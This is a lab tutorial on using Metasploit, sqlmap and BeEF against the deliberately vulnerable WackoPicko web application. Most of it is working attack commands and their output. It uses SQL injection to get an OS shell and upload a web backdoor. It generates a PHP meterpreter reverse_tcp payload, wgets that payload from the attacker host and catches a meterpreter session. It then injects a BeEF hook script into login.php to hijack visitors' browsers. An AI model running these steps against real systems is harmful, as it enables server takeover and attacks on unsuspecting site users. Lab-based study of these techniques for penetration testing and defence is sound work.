By Sumedt
Jitpukdebodin
Normally,
Penetration Tester or a Hacker use Metasploit to exploit vulnerability services
in the target server or to create a payload to make a backdoor in the hacked
server. But Metastploit has improved with many plugins and modules and now it
can do more than that. It can be used to pentest web applications too.
In this article,
I will show you how to use Metasploit for scanning to get the information of
web server and use Metasploit to be a vulnerability assessment of web
application.
Scenario
In this article,
we will try to attack client who use this vulnerability server. And this is the
detail of character in this scenario.
1.Attacker
Machine - Backtrack 5 R3 192.168.1.137
2.Target – WackoPicko
web application (one of website in OWASP Broken Web Application v1.0)
192.168.1.138
Scanning Phase
First thing when
you want to hack server, you must get the information of target as much as you
can. So the first thing we must do is scan server. Metastploit has “db_nmap” a
module that use to run nmap (the most famous scanning tool) and when it gets
the result from nmap, it is putting the results into the database which was
created to keep the results. Follow these steps:
1.Open
Metasploit console
root@bt:/
msfconsole
2.In the
Metasploit console use db_nmap command with IP Address of target machine.
msf > db_nmap
[*] Usage: db_nmap
[nmap options]
msf > db_nmap
192.168.77.138
3.We can check the
result of scanning with “hosts” command.
msf > hosts –h
msf> hosts
4.You can use
“services” command to receive a detail of services. And it has “created_at,
info, name, port, proto, state, updated_at” column for display .
msf >
services –h
msf >
services
msf> services
-c port,name,state
From above, the
result show that the target server has web service. Metasploit has module for
crawling a website too.
1.Pick up the
auxiliary/scanner/http/crawler module.
msf> use
auxiliary/scanner/http/crawler
2.Specific the target with RHOST
msf
auxiliary(crawler) > set RHOST 192.168.77.138
In this article,
we focus to WackoPicko web application and we will specific it with URI msf
auxiliary(crawler) > set URI /WackoPicko/
3.Start crawling website
msf auxiliary(crawler)
> run
From this phase,
you can get the information from server and web application. The next phase, we
will use the information for attack it.
Exploit Phase
In this phase,
we will try to attack it with vulnerability scanning module of Metasploit and
try to use it with another attack tool.
WMAP Plugin
"WMAP is a
general purpose web application scanning framework for Metasploit 3. The
architecture is simple and its simplicity is what makes it powerful. It's a
different approach compared to other open source alternatives and commercial
scanners, as WMAP is not build around any browser or spider for data capture
and manipulation.", we will use this module to vulnerability scanning
website. The step are
1.load wmap
modules
msf auxiliary(crawler)
> load wmap
2.In the
scanning phase, we has already crawling the web and it keeps all information
into database. WMAP Plugin can read it to learn the structure of web
application. And you can display detail of web application with wmap_sites
command.
msf
auxiliary(crawler) > wmap_sites
msf
auxiliary(crawler) > wmap_sites –l
3.If you want to see the
structure of web application, you can use wmap_sites command.
wmap_sites -s [target_id]
msf
auxiliary(crawler) > wmap_sites -s 0
4.Now we are
ready for scanning, so we will specific the target of web application with
wmap_targets command.
msf
auxiliary(crawler) > wmap_targets
msf
auxiliary(crawler) > wmap_targets –t
5.Start automate vulnerability
scan with wmap_run command.
msf
auxiliary(crawler) > wmap_run
msf
auxiliary(crawler) > wmap_run –e
6.After finished scan, you can
check the result of scan with wmap_vulns
msf auxiliary(crawler) > wmap_vulns –l
From the result,
we know some vulnerability of this web application such as “sensitive file or
directory”, “admin directory”, “back up directory”, “SQL Injection
vulnerability page”, etc. Now you can try to attack it from this result.
SQL Injection with Metasploit
If you want to
test the parameter that has SQL Injection vulnerability or not, you can try to
test it with Metasploit too. I will use auxiliary/scanner/http/blind_sql_query
module for this test.
1.After
we scan with WMAP Plugin, we know that
http://192.168.77.138/WackoPicko/users/login.php has SQL Injection
vulnerability and it has two parameter: username, password. Now we try to test
username parameter with auxiliary/scanner/http/blind_sql_query module.
msf > use
auxiliary/scanner/http/blind_sql_query
msf
auxiliary(blind_sql_query) > show options
2.Specific the environment of target page.
msf
auxiliary(blind_sql_query) > set DATA
username=hacker&password=password&submit=login
msf
auxiliary(blind_sql_query) > set METHOD POST
msf auxiliary(blind_sql_query)
> set PATH /WackoPicko/users/login.php
msf
auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138
3.Start to test.
msf
auxiliary(blind_sql_query) > run
The result is
“username” parameter has SQL Injection vulnerability. You can test another SQL
Injection technique [ Error Based Technique] with auxiliary/scanner/http/error_sql_injection
module.
Now we know “username” parameter
of users/login.php page has vulnerability and we use this vulnerability to
owning the website with sqlmap. SQLMap is the famous tool for SQL Injection and
it great work with Metasploit.
1. we will use 3 options of
sqlmap for this attack.
-u URL target url
-data=DATA Data string to be sent through
POST
-random-agent Use randomly selected HTTP User-Agent header
--os-shell Prompt for an
interactive operating system shell
2. Now, run the sqlmap with
detail that we have. After this command, if the user that used for this application
has enough privilege, you can get the shell.(this below is the output from SQLMap
process for upload shell.)
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://192.168.77.138/WackoPicko/users/login.php"
--data
"username=hacker&password=password&submit=login"
--os-shell
sqlmap/1.0-dev-4649450
- automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal
disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible
for any misuse or damage caused by this program
[*] starting at
10:21:05
[10:21:05]
[INFO] resuming back-end DBMS 'mysql'
[10:21:05]
[INFO] testing connection to the target url
sqlmap got a 303
redirect to
'http://192.168.77.138:80/WackoPicko/users/home.php'.
Do you want to follow?
[Y/n] Y
[10:21:07]
[INFO] heuristics detected web page charset 'None'
[10:21:07]
[INFO] heuristics detected web page charset 'ascii'
sqlmap
identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter:
username
Type:
boolean-based blind
Title: AND
boolean-based blind - WHERE or HAVING clause
Payload:
username=hacker' AND 2163=2163 AND
'YJxM'='YJxM&password=password&submit=login
Type:
error-based
Title: MySQL
>= 5.0 AND error-based - WHERE or HAVING clause
Payload:
username=hacker' AND (SELECT 3246 FROM(SELECT
COUNT(*),CONCAT(0x3a6377663a,(SELECT
(CASE WHEN (3246=3246) THEN 1
ELSE 0
END)),0x3a6268653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) AND
'oBNd'='oBNd&password=password&submit=login
---
[10:21:07]
[INFO] the back-end DBMS is MySQL
web server
operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application
technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS:
MySQL 5
[10:21:07]
[INFO] going to use a web backdoor for command prompt
[10:21:07]
[INFO] fingerprinting the back-end DBMS operating system
[10:21:07]
[INFO] the back-end DBMS operating system is Linux
[10:21:07]
[INFO] trying to upload the file stager
which web
application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP
(default)
[4] JSP
> 3
[10:21:09]
[WARNING] unable to retrieve the web server document root
please provide
the web server document root [/var/www/]:
[10:21:10]
[WARNING] unable to retrieve any web server path
please provide
any additional web server full path to try to upload the agent [Enter
for None]:
[10:21:10]
[WARNING] unable to upload the file stager on '/var/www'
[10:21:10]
[INFO] the file stager has been successfully uploaded on
'/var/www/WackoPicko/users'
-
http://192.168.77.138:80/WackoPicko/users/tmputgqe.php
[10:21:10]
[INFO] the backdoor has been successfully uploaded on
'/var/www/WackoPicko/users'
-
http://192.168.77.138:80/WackoPicko/users/tmpblzgg.php
[10:21:10]
Now we're in the
target machine, we will create backdoor for make it easier to connect back and
easier to compromise this machine.
3. We will
create backdoor with Metasploit(msfvenom command).
root@bt:~#
msfvenom
no options
Usage:
/opt/metasploit/msf3/msfvenom [options] <var=val>
Options:
-p, --payload
[payload] Payload to use. Specify a '-' or stdin to use custom
payloads
-l, --list
[module_type] List a module type example: payloads, encoders,
nops, all
-n, --nopsled
[length] Prepend a nopsled of [length] size on to the payload
-f, --format [format]
Output format (use --help-formats for a list)
-e, --encoder
[encoder] The encoder to use
-a, --arch
[architecture] The architecture to use
--platform [platform]
The platform of the payload
-s, --space [length]
The maximum size of the resulting payload
-b, --bad-chars
[list] The list of characters to avoid example: '\x00\xff'
-i, --iterations
[count] The number of times to encode the payload
-c, --add-code [path]
Specify an additional win32 shellcode file to include
-x, --template [path]
Specify a custom executable file to use as a template
-k, --keep Preserve
the template behavior and inject the payload as
a new thread
-o, --options List
the payload's standard options
-h, --help Show this
message
--help-formats List
available formats
root@bt:~# msfvenom
-p php/meterpreter/reverse_tcp LHOST=192.168.77.137
LPORT=443 -f raw >
/var/www/bd.php
root@bt:~#
mv /var/www/bd.php /var/www/bd.jpg
4. In the shell of target
machine, download the backdoor and change it to bd.php.
os-shell> wget
http://192.168.77.137/bd.jpg
do you want to retrieve the
command standard output? [Y/n/a] Y
command standard output:
---
--2012-08-26 23:47:21-- http://192.168.77.137/bd.php
Connecting to
192.168.77.137:80... connected.
HTTP request sent, awaiting
response... 200 OK
Length: 10 [text/html]
Saving to: `bd.php'
0K 100% 2.04M=0s
2012-08-26 23:47:21 (2.04 MB/s) -
`bd.php' saved [10/10]
---
os-shell> pwd
do you want to retrieve the
command standard output? [Y/n/a] y
command standard output:
'/owaspbwa/owaspbwasvn/
var/www/WackoPicko/users'
os-shell> mv bd.jpg bd.php
do you want to retrieve the
command standard output? [Y/n/a] y
No output
5. Create the handler for waiting
connection back from bd.php.
root@bt:~# msfcli multi/handler
PAYLOAD=php/meterpreter/reverse_tcp
LHOST=192.168.77.137 LPORT=443 E
[*] Please wait while we load the
module tree...
IIIIII dTb.dTb _.---._
II 4' v 'B
.'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.5.0-dev
[core:4.5 api:1.0]
+ -- --=[ 932 exploits - 499
auxiliary - 151 post
+ -- --=[ 251 payloads - 28
encoders - 8 nops
=[ svn r15753 updated 11 days ago
(2012.08.16)
Warning: This copy of the
Metasploit Framework was last updated 11 days ago.
We recommend that you update the
framework at least every other day.
For information on updating your
copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
PAYLOAD =>
php/meterpreter/reverse_tcp
LHOST => 192.168.77.137
LPORT => 443
[*] Started reverse handler on
192.168.77.137:443
[*] Starting the
payload handler...
6. Run the backdoor with your web
browser. And now you will get the meterpreter in you metsaploit console
=[ metasploit v4.5.0-dev
[core:4.5 api:1.0]
+ -- --=[ 932 exploits - 499
auxiliary - 151 post
+ -- --=[ 251 payloads - 28
encoders - 8 nops
=[ svn r15753 updated 11 days ago
(2012.08.16)
Warning: This copy of the
Metasploit Framework was last updated 11 days ago. We recommend that you update
the framework at least every other day. For information on updating your copy
of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306
PAYLOAD => php/meterpreter/reverse_tcp
LHOST => 192.168.77.137
LPORT => 443
[*] Started reverse handler on
192.168.77.137:443
[*] Starting the payload
handler...
[*] Sending stage (39217 bytes)
to 192.168.77.138
[*] Meterpreter session 1 opened
(192.168.77.137:443 -> 192.168.77.138:42757) at
2012-08-27 11:05:31 +0700
meterpreter >
Now you are in the owning machine
and can do everything you want with Metasploit. In the next, we will use BeEF
to compromise the victim who visit website of this machine.
Metasploit
with BeEF plugin
And the last of this article, we
will use Metasploit with BeEF(Browser Exploit Framework). So what is BeEF.
“BeEF hooks one or more web browsers as beachheads for the launching of
directed command modules. Each browser is likely to be within a different
security context, and each context may provide a set of unique attack vectors.”
1.Run the beef service
root@bt:/pentest/web/beef# ./beef
-x -v
2.Go to Metasploit plugin path
and download BeEF plugin of Metasploit from
“https://github.com/xntrik/beefmetasploitplugin.git”
$ cd
/pentest/exploits/framework/msf3
$ git clone
https://github.com/xntrik/beefmetasploitplugin.git
Initialized
empty Git repository in /opt/metasploit/msf3/beefmetasploitplugin/.git/
3.Move file beef.rb to
msf/plugins and lib/beef to msf/lib
$
root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/lib/beef lib/
$
root@bt:/pentest/exploits/framework/msf3# mv
beefmetasploitplugin/plugins/beef.rb
plugins/
4.Install hpricot,json gem
$
root@bt:/pentest/exploits/framework/msf3# gem install hpricot json
5.In the Metasploit console, load
BeEF plugin.
msf > load
beef
6.Connect to BeEF
msf > beef_connect
msf >
beef_connect http://127.0.0.1:3000 beef beef
7. In this step, we want to run
the BeEF script on any client who visit the login page. Back to the shell
meterpreter that you got in the last phase of sqlmap attack. Download login.php
page. Add the script <script
src='http://192.168.77.137:3000/hook.js></script>
into the file and upload it to
host.
meterpreter > download
login.php .
[*] downloading: login.php ->
./login.php
[*] downloaded :
login.php -> ./login.php
root@bt:~# echo "<script
src='http://192.168.77.137:3000/hook.js></script>" >>
login.php
meterpreter > upload login.php
.
[*] uploading : login.php -> .
[*] uploaded : login.php ->
./login.php
meterpreter >
Now when victim visit the login
page, he will run the script of BeEF.
8.Go to BeEF web management
interface
(http://127.0.0.1:3000/ui/panel),
login with username “beef” and password
“beef”
9.If someone visit login.php
page, he will attacked by BeEF and in the left panel of BeEF will show the list
of victim.
If you want to see the detail of
victim, just click it. The detail of victim will appear in the right panel.
So you can check the list of
victim from Metasploit console too, with beef_online command.
msf > beef_online
And if you want to check the
detail of victim in Metasploit console, use beef_target command
msf > beef_target
msf > beef_target -i 0
10.Now you can run the command of
BeEF with beef_target command
msf > beef_target -c 0 47
fter run the beef_target command,
in the BeEF's console, BeEF will use “Man-In The_Browser” command to victim.
Conclusion
Now you know
that Metasploit can do everything you want for penetration testing in web
application but it has the limited too. It cannot test all the vulnerability
types of web application but it can support another tool for it such as it
cannot test Cross-Site Scripting but you can use it to own client with the
Metasploit + BeEF, it cannot test Remote File Inclusion but it can create a
backdoor payload php for it. But in the future, I think Metasploit may be test
all of them. If you want to start to learn how to attack in computer,
Metasploit will be the great choice to learn everything about attack surfaces
of computer.
Share